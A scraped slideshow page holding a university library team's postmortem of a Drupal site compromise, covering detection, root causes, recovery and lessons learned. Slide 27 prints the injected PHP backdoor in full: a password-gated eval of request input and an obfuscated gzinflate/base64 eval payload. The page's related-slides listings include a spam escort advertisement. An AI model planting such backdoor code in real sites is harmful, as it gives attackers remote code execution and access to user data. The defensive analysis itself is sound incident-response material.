Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 

Último (20)

#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 

Anatomy of a Drupal Hack - TechKnowFile 2014

  • 1. Anatomy of a Drupal Hack Graham Stewart Network and Storage Services Manager Bilal Khalid Senior Application Developer University of Toronto Libraries
  • 2. ITS at University of Toronto Libraries => wide range of services and resources in support of the Library’s role in supporting the research, teaching and learning mission of the university and its community. => develop and maintain digital collections and web-based resources => upward of 100 web sites, > 200 servers, ~1 PB storage, 56M visits to sites in FY 2012 Photo: Gordon Belray
  • 6. Not just hardware ... Collaborative environment between: - programmers / developers / designers - librarians - sysadmins / operations Technology environment: - open source tools - Linux (Ubuntu, Redhat), KVM
  • 7. … and we’re hiring !
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16. Application and caching Database Load balancing Storage or rsync IP HAProxy / Keepalived HAProxy / Keepalived IP Memcached/ Keepalived Memcached/ Keepalived IPMySQL MySQL User Varnish APC Apach e & PHP Varnish APC Apach e & PHP Varnish APC Apach e & PHP Varnish APC Apach e & PHP
  • 19. 12:18 “Update: Armorial down for 1.5 hours, server side issue? maybe caching?”
  • 20.
  • 21.
  • 22. Symptom or root problem? Chef ? MySQL error? Restart Apache? Restart server? Recent OS updates? PHP versions? Drupal Customizations? Anything updated in Drupal? Hacked !?#%$&!
  • 23. Detection - apache log analysis - looked for odd traffic patterns - in particular, isolated all wp-conf requests - “hack” attempt started a couple of weeks before - successful injection occurred the day before
  • 24. Exploit... FCKEditor Bug - allows XSS attacks Sources: https://drupal.org/node/1482528 http://webcache.googleusercontent.com/search?q=cache:http://exploitsdownload .com/exploit/na/drupal-fckeditorckeditor-php-execution
  • 25. … + PHP Execution... PHP Filter Module - core module that allows ‘client’ PHP execution - disabled by default
  • 26. … + Permission issues... Incorrect rwx permissions for sites/default/files - allowed user uploaded files to be executable by www- data - www-data also had write permissions to /var/www!
  • 27. … = Code Injection Snippet found inserted at the top of random PHP files throughout the site: if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'edd1d65d726121336405c4d2554df925') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); } eval(gzinflate(base64_decode('y0zTyCwuTi3RUIkPcg0MdQ0OiVZPzlCP1VRQU1 PQyE0xxZSwtVVQT01JMUwxM00xNzIzNDI0NjYzMTBNNkkxMjU1SUmzNDJVB+ vHMLkgoyA+OT8lFWiMpkK1QmpZYg4OaWuF1IrMEg0gXQsA'))); Reversing gzinflate:
  • 29. Risk Exposure - hijack/deface site - ransomware => blackmail - host their own content - execute phishing attacks - gain access to other sites on server (if any) - exploit OS vulnerabilities
  • 30. Risk Exposure - use Drupal’s settings.php to gain access to the database/salt - harvest public/private site content - access personal user information (including passwords!!) - access other dbs/sites if they use the same credentials
  • 31. The Recovery - Restoration - restored site from a couple of days prior - all servers are backed up nightly (incl. files and db) - at most 48 hours of data loss - correct file-system permissions - disabled FCKEditor, PHP Filter modules - reset Drupal admin password - changed all site users’ passwords
  • 32. The Recovery - Communication - contacted all potentially affected site members - clear, honest communication - possibility of personal information being leaked - possibility passwords might have been compromised - do users use same passwords for other services?
  • 33. Lessons Learned - Drupal - first real Drupal problem - follow Drupal security guidelines! - https://drupal.org/security/secure-configuration - vet the required core, contrib and custom modules for project - stay on top of the updates - test patches and updates and implement rapidly - use https for all secure pages (whenever possible) - install security modules - Security Review, Security Kit, Login Security, ... - if developing, use Drupal’s built-in checking functions
  • 34. Lessons Learned - Operational - review site security policies - enforcement: periodic security sweeps - tight control on production environments - protect the core code with version control - use https whenever authentication is involved - mod_security to block attacks - establish security analysis practices - metrics - traffic analysis - log triggers and notifications
  • 35. Embrace Failure - Failure rarely has a single cause: - systems are very complex, many interdependencies - answers are not necessarily obvious - weakness can be latent, triggered by other flaws - red herrings - swiss cheese
  • 36. Source: John Allspaw: Advanced PostMortem Fu and Human Error 101 http://www.slideshare.net/jallspaw/advanced-postmortem-fu-and-human-error-101- velocity-2011
  • 37. Lessons Learned - Cultural - Everyone must have the organization’s end goals in mind - Team of experts or team of poly-skilled polyglots? - Emergency roles may differ from normal roles - Emergency communication channels must be defined - Failure rehearsals: deliberately break things: - The culture must be free of blame